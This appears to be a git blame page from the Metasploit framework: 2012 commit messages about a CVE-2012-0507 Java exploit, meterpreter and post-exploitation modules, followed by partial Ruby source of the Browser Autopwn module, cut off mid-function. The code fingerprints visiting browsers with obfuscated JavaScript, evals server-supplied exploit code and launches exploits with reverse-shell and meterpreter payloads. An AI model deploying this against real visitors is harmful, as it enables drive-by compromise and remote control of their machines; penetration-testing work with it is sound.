Date: Thu Apr 5 15:16:56 2012 -0600
Merge branch 'rapid7'
Conflicts:
lib/rex/exploitation/javascriptosdetect.rb
commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 18:04:50 2012 -0600
Linux doesn't implement (drop|steal)_token
commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 17:57:37 2012 -0600
Add availability checks for net, sys, ui, and webcam
commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 16:45:59 2012 -0600
add requirement checking for fs and core commands
commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:59 2012 -0600
Add a to_octal method that converts e.g. "A" to \0101
commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:07 2012 -0600
Don't use "echo -n"
It's not portable
commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 17:01:10 2012 -0600
Return a list of new commands after core_loadlib, java version
Thanks mihi for the patch and the awesome responsiveness!
commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 13:21:06 2012 -0600
Make sure we have a response before doing stuff with it
commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 21:25:31 2012 -0600
Add missing rmdir and mkdir protocol commands to PHP
Now passes all the stdapi tests that it can
[*] Session type is meterpreter and platform is php/php
[+] should return a user id
[+] should return a sysinfo Hash
[-] FAILED: should return network interfaces
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should have an interface that matches session_host
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[-] Passed: 10; Failed: 3
commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:26:00 2012 -0600
Use a proper TLV type instead of a generic one
commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:24:25 2012 -0600
Fix a counting error that caused segfaults (Linux)
commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:06:02 2012 -0600
Return a list of new commands after core_loadlib
Gets Windows back in sync with Linux
commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 14:50:55 2012 -0600
Refactor extensionList -> extension_commands
It's not the same as extension_list.
commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sun Mar 18 00:07:27 2012 -0500
Massive whitespace cleanup
commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 16:00:20 2012 -0500
Add back enum_protections with some new changes
commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date: Sat Mar 17 13:28:31 2012 -0400
Added fix for enum_protections
commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 03:14:26 2012 -0500
A bunch of fixes
commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:28:05 2012 -0500
The comments in get_chatlogs need an update
commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:25:41 2012 -0500
Correct license format
commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:22:03 2012 -0500
Add enum_adium.rb post module
commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 16:54:36 2012 -0300
Changed store_note to store_loot. Fixed local/remote file retrieval
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd part av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
2012-05-15 23:00:02 +00:00
|
|
|
'The payload to use for generic reverse-connect payloads',
|
2011-01-20 20:32:18 +00:00
|
|
|
'generic/shell_reverse_tcp'
|
2009-11-11 21:38:30 +00:00
|
|
|
]),
|
2010-08-30 21:36:38 +00:00
|
|
|
OptPort.new('LPORT_JAVA', [false,
|
2011-01-20 20:32:18 +00:00
|
|
|
'The port to use for Java reverse-connect payloads', 7777
|
|
|
|
]),
|
|
|
|
OptString.new('PAYLOAD_JAVA', [false,
|
|
|
|
'The payload to use for Java reverse-connect payloads',
|
|
|
|
'java/meterpreter/reverse_tcp'
|
2010-08-30 21:36:38 +00:00
|
|
|
]),
|
2008-08-08 06:00:30 +00:00
|
|
|
], self.class)
|
2008-07-01 01:44:56 +00:00
|
|
|
|
|
|
|
@exploits = Hash.new
|
2009-11-11 21:38:30 +00:00
|
|
|
@payloads = Hash.new
|
2009-07-22 20:14:35 +00:00
|
|
|
@targetcache = Hash.new
|
2010-03-04 07:37:58 +00:00
|
|
|
@current_victim = Hash.new
|
2010-09-21 22:43:50 +00:00
|
|
|
@handler_job_ids = []
|
2009-07-19 17:27:36 +00:00
|
|
|
end
|
2009-07-22 20:14:35 +00:00
|
|
|
|
|
|
|
|
2011-05-20 09:11:43 +00:00
|
|
|
##
|
|
|
|
# CommandDispatcher stuff
|
|
|
|
##
|
|
|
|
|
|
|
|
def auxiliary_commands
|
|
|
|
{
|
|
|
|
'list' => "%red#{self.refname}%clr: List the exploits as filtered by MATCH and EXCLUDE"
|
|
|
|
}
|
|
|
|
end
|
|
|
|
|
|
|
|
def cmd_list(*args)
|
|
|
|
print_status("Listing Browser Autopwn exploits:")
|
|
|
|
print_line
|
2011-06-03 00:36:26 +00:00
|
|
|
@exploits = {}
|
2011-05-20 09:11:43 +00:00
|
|
|
each_autopwn_module do |name, mod|
|
|
|
|
@exploits[name] = nil
|
|
|
|
print_line name
|
|
|
|
end
|
|
|
|
print_line
|
|
|
|
print_status("Found #{@exploits.length} exploit modules")
|
|
|
|
end
|
|
|
|
|
|
|
|
##
|
|
|
|
# Actual exploit stuff
|
|
|
|
##
|
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
def run
|
|
|
|
if (action.name == 'list')
|
2011-05-20 09:11:43 +00:00
|
|
|
cmd_list
|
2009-08-06 05:56:24 +00:00
|
|
|
elsif (action.name == 'DefangedDetection')
|
2011-05-20 09:11:43 +00:00
|
|
|
# Do everything we'd normally do for exploits, but don't start any
|
|
|
|
# actual exploit modules
|
2009-08-06 05:56:24 +00:00
|
|
|
exploit()
|
2010-04-30 08:40:19 +00:00
|
|
|
else
|
2009-07-22 20:14:35 +00:00
|
|
|
start_exploit_modules()
|
2009-07-28 11:29:14 +00:00
|
|
|
if @exploits.length < 1
|
|
|
|
print_error("No exploits, check your MATCH and EXCLUDE settings")
|
|
|
|
return false
|
|
|
|
end
|
2009-07-22 20:14:35 +00:00
|
|
|
exploit()
|
2010-04-30 08:40:19 +00:00
|
|
|
end
|
2009-07-22 20:14:35 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
2009-08-06 05:56:24 +00:00
|
|
|
def setup
|
2011-07-01 23:50:07 +00:00
|
|
|
print_status("Setup")
|
2009-08-06 05:56:24 +00:00
|
|
|
|
2011-06-03 00:36:26 +00:00
|
|
|
@init_js = ::Rex::Exploitation::JavascriptOSDetect.new <<-ENDJS
|
2009-08-06 05:56:24 +00:00
|
|
|
|
|
|
|
#{js_base64}
|
2009-11-11 21:38:30 +00:00
|
|
|
|
2009-08-06 05:56:24 +00:00
|
|
|
function make_xhr() {
|
|
|
|
var xhr;
|
2010-04-30 08:40:19 +00:00
|
|
|
try {
|
|
|
|
xhr = new XMLHttpRequest();
|
2009-08-06 05:56:24 +00:00
|
|
|
} catch(e) {
|
2010-04-30 08:40:19 +00:00
|
|
|
try {
|
|
|
|
xhr = new ActiveXObject("Microsoft.XMLHTTP");
|
2009-08-06 05:56:24 +00:00
|
|
|
} catch(e) {
|
|
|
|
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
|
|
|
|
}
|
|
|
|
}
|
|
|
|
if (! xhr) {
|
|
|
|
throw "failed to create XMLHttpRequest";
|
|
|
|
}
|
|
|
|
return xhr;
|
|
|
|
}
|
|
|
|
|
|
|
|
function report_and_get_exploits(detected_version) {
|
|
|
|
var encoded_detection;
|
|
|
|
xhr = make_xhr();
|
|
|
|
xhr.onreadystatechange = function () {
|
|
|
|
if (xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
|
2011-06-03 00:36:26 +00:00
|
|
|
//var ta = document.createElement("textarea");
|
|
|
|
//ta.rows = ta.cols = 100;
|
|
|
|
//ta.value = xhr.responseText;
|
|
|
|
//document.body.appendChild(ta)
|
2009-08-06 05:56:24 +00:00
|
|
|
eval(xhr.responseText);
|
|
|
|
}
|
|
|
|
};
|
|
|
|
|
|
|
|
encoded_detection = new String();
|
|
|
|
#{js_debug('navigator.userAgent+"<br><br>"')}
|
|
|
|
for (var prop in detected_version) {
|
|
|
|
#{js_debug('prop + " " + detected_version[prop] +"<br>"')}
|
|
|
|
encoded_detection += detected_version[prop] + ":";
|
|
|
|
}
|
2011-06-03 00:36:26 +00:00
|
|
|
#{js_debug('"<br>"')}
|
2009-08-06 05:56:24 +00:00
|
|
|
encoded_detection = Base64.encode(encoded_detection);
|
|
|
|
xhr.open("GET", document.location + "?sessid=" + encoded_detection);
|
|
|
|
xhr.send(null);
|
|
|
|
}
|
|
|
|
|
|
|
|
function bodyOnLoad() {
|
2012-04-04 23:07:17 +00:00
|
|
|
var detected_version = window.os_detect.getVersion();
|
2009-08-06 05:56:24 +00:00
|
|
|
//#{js_debug('detected_version')}
|
|
|
|
report_and_get_exploits(detected_version);
|
|
|
|
} // function bodyOnLoad
|
|
|
|
ENDJS
|
|
|
|
|
|
|
|
if (datastore['DEBUG'])
|
2012-04-18 00:54:26 +00:00
|
|
|
print_debug("NOTE: Debug Mode; javascript will not be obfuscated")
|
2009-08-06 05:56:24 +00:00
|
|
|
else
|
2011-07-01 23:50:07 +00:00
|
|
|
pre = Time.now
|
|
|
|
print_status("Obfuscating initial javascript #{pre}")
|
2011-06-03 00:36:26 +00:00
|
|
|
@init_js.obfuscate
|
2011-07-01 23:50:07 +00:00
|
|
|
print_status "Done in #{Time.now - pre} seconds"
|
2009-08-06 05:56:24 +00:00
|
|
|
end
|
|
|
|
|
2009-12-16 00:13:57 +00:00
|
|
|
#@init_js << "window.onload = #{@init_js.sym("bodyOnLoad")};";
|
2010-12-15 23:02:04 +00:00
|
|
|
@init_html = %Q|<html > <head > <title > Loading </title>\n|
|
|
|
|
@init_html << %Q|<script language="javascript" type="text/javascript">|
|
|
|
|
@init_html << %Q|<!-- \n #{@init_js} //-->|
|
|
|
|
@init_html << %Q|</script> </head> |
|
|
|
|
@init_html << %Q|<body onload="#{@init_js.sym("bodyOnLoad")}()"> |
|
2012-04-04 23:07:17 +00:00
|
|
|
@init_html << %Q|<div id="foo"></div> |
|
2010-12-15 23:02:04 +00:00
|
|
|
@init_html << %Q|<noscript> \n|
|
2010-03-24 16:28:04 +00:00
|
|
|
# Don't use build_iframe here because it will break detection in
|
|
|
|
# DefangedDetection mode when the target has js disabled.
|
2010-12-15 23:02:04 +00:00
|
|
|
@init_html << %Q|<iframe src="#{self.get_resource}?ns=1"></iframe>|
|
|
|
|
@init_html << %Q|</noscript> \n|
|
|
|
|
@init_html << %Q|</body> </html> |
|
2009-08-06 05:56:24 +00:00
|
|
|
|
2009-11-11 21:38:30 +00:00
|
|
|
#
|
|
|
|
# I'm still not sold that this is the best way to do this, but random
|
|
|
|
# LPORTs causes confusion when things break and breakage when firewalls
|
|
|
|
# are in the way. I think the ideal solution is to have
|
|
|
|
# self-identifying payloads so we'd only need 1 LPORT for multiple
|
|
|
|
# stagers.
|
|
|
|
#
|
2011-01-20 20:32:18 +00:00
|
|
|
@win_lport = datastore['LPORT_WIN32']
|
|
|
|
@win_payload = datastore['PAYLOAD_WIN32']
|
|
|
|
@lin_lport = datastore['LPORT_LINUX']
|
|
|
|
@lin_payload = datastore['PAYLOAD_LINUX']
|
|
|
|
@osx_lport = datastore['LPORT_MACOS']
|
|
|
|
@osx_payload = datastore['PAYLOAD_MACOS']
|
|
|
|
@gen_lport = datastore['LPORT_GENERIC']
|
|
|
|
@gen_payload = datastore['PAYLOAD_GENERIC']
|
|
|
|
@java_lport = datastore['LPORT_JAVA']
|
|
|
|
@java_payload = datastore['PAYLOAD_JAVA']
|
2009-12-16 00:13:57 +00:00
|
|
|
|
|
|
|
minrank = framework.datastore['MinimumRank'] || 'manual'
|
|
|
|
if not RankingName.values.include?(minrank)
|
|
|
|
print_error("MinimumRank invalid! Possible values are (#{RankingName.sort.map{|r|r[1]}.join("|")})")
|
|
|
|
wlog("MinimumRank invalid, ignoring", 'core', LEV_0)
|
|
|
|
end
|
|
|
|
@minrank = RankingName.invert[minrank]
|
|
|
|
|
2009-08-06 05:56:24 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
def init_exploit(name, mod = nil, targ = 0)
|
|
|
|
if mod.nil?
|
|
|
|
@exploits[name] = framework.modules.create(name)
|
|
|
|
else
|
|
|
|
@exploits[name] = mod.new
|
|
|
|
end
|
2011-05-20 09:11:43 +00:00
|
|
|
@exploits[name] = framework.modules.reload_module(@exploits[name])
|
|
|
|
|
|
|
|
# Reloading failed
|
|
|
|
unless @exploits[name]
|
|
|
|
@exploits.delete(name)
|
2011-10-17 02:42:01 +00:00
|
|
|
return
|
2011-05-20 09:11:43 +00:00
|
|
|
end
|
|
|
|
|
2009-12-16 00:13:57 +00:00
|
|
|
apo = @exploits[name].class.autopwn_opts
|
|
|
|
if (apo[:rank] < @minrank)
|
|
|
|
@exploits.delete(name)
|
|
|
|
return false
|
|
|
|
end
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2008-07-01 01:44:56 +00:00
|
|
|
case name
|
2009-07-22 20:14:35 +00:00
|
|
|
when %r{windows}
|
2011-01-20 20:32:18 +00:00
|
|
|
payload = @win_payload
|
2009-11-11 21:38:30 +00:00
|
|
|
lport = @win_lport
|
2011-01-20 20:32:18 +00:00
|
|
|
=begin
|
|
|
|
#
|
2011-10-17 02:42:01 +00:00
|
|
|
# Some day, we'll support Linux and Mac OS X here..
|
2011-01-20 20:32:18 +00:00
|
|
|
#
|
|
|
|
|
|
|
|
when %r{linux}
|
|
|
|
payload = @lin_payload
|
|
|
|
lport = @lin_lport
|
|
|
|
|
|
|
|
when %r{osx}
|
|
|
|
payload = @osx_payload
|
|
|
|
lport = @osx_lport
|
|
|
|
=end
|
|
|
|
|
2010-08-20 20:49:33 +00:00
|
|
|
# We need to check that it's /java_ instead of just java since it would
|
|
|
|
# clash with things like mozilla_navigatorjava. Better would be to
|
|
|
|
# check the actual platform of the module here but i'm lazy.
|
|
|
|
when %r{/java_}
|
2011-01-20 20:32:18 +00:00
|
|
|
payload = @java_payload
|
2010-08-20 20:49:33 +00:00
|
|
|
lport = @java_lport
|
2008-07-01 01:44:56 +00:00
|
|
|
else
|
2011-01-20 20:32:18 +00:00
|
|
|
payload = @gen_payload
|
2009-11-11 21:38:30 +00:00
|
|
|
lport = @gen_lport
|
2010-04-30 08:40:19 +00:00
|
|
|
end
|
2009-11-11 21:38:30 +00:00
|
|
|
@payloads[lport] = payload
|
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
print_status("Starting exploit #{name} with payload #{payload}")
|
2009-11-16 22:06:32 +00:00
|
|
|
@exploits[name].datastore['SRVHOST'] = datastore['SRVHOST']
|
2008-07-01 01:44:56 +00:00
|
|
|
@exploits[name].datastore['SRVPORT'] = datastore['SRVPORT']
|
|
|
|
|
2008-09-01 05:19:28 +00:00
|
|
|
# For testing, set the exploit uri to the name of the exploit so it's
|
|
|
|
# easy to tell what is happening from the browser.
|
2009-07-23 08:43:54 +00:00
|
|
|
if (datastore['DEBUG'])
|
2010-04-30 08:40:19 +00:00
|
|
|
@exploits[name].datastore['URIPATH'] = name
|
2009-07-23 08:43:54 +00:00
|
|
|
else
|
2011-05-20 09:11:43 +00:00
|
|
|
# randomize it manually since if a saved value exists in the user's
|
|
|
|
# configuration, the saved value will get used if we set it to nil
|
|
|
|
@exploits[name].datastore['URIPATH'] = Rex::Text.rand_text_alpha(rand(10) + 4)
|
2009-07-23 08:43:54 +00:00
|
|
|
end
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2010-10-01 14:06:59 +00:00
|
|
|
@exploits[name].datastore['WORKSPACE'] = datastore["WORKSPACE"] if datastore["WORKSPACE"]
|
|
|
|
@exploits[name].datastore['MODULE_OWNER'] = self.owner
|
2011-01-17 22:15:22 +00:00
|
|
|
@exploits[name].datastore['ParentUUID'] = datastore["ParentUUID"] if datastore["ParentUUID"]
|
|
|
|
@exploits[name].datastore['AutopwnUUID'] = self.uuid
|
2009-11-11 21:38:30 +00:00
|
|
|
@exploits[name].datastore['LPORT'] = lport
|
2009-07-22 20:14:35 +00:00
|
|
|
@exploits[name].datastore['LHOST'] = @lhost
|
2010-12-15 23:02:04 +00:00
|
|
|
@exploits[name].datastore['SSL'] = datastore['SSL']
|
|
|
|
@exploits[name].datastore['SSLVersion'] = datastore['SSLVersion']
|
2009-07-23 08:43:54 +00:00
|
|
|
@exploits[name].datastore['EXITFUNC'] = datastore['EXITFUNC'] || 'thread'
|
2009-11-11 21:38:30 +00:00
|
|
|
@exploits[name].datastore['DisablePayloadHandler'] = true
|
2008-07-01 01:44:56 +00:00
|
|
|
@exploits[name].exploit_simple(
|
|
|
|
'LocalInput' => self.user_input,
|
|
|
|
'LocalOutput' => self.user_output,
|
2008-07-22 07:28:05 +00:00
|
|
|
'Target' => targ,
|
2008-07-01 01:44:56 +00:00
|
|
|
'Payload' => payload,
|
|
|
|
'RunAsJob' => true)
|
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
# It takes a little time for the resources to get set up, so sleep for
|
|
|
|
# a bit to make sure the exploit is fully working. Without this,
|
|
|
|
# mod.get_resource doesn't exist when we need it.
|
|
|
|
Rex::ThreadSafe.sleep(0.5)
|
2010-07-11 23:53:47 +00:00
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
# Make sure this exploit got set up correctly, return false if it
|
|
|
|
# didn't
|
|
|
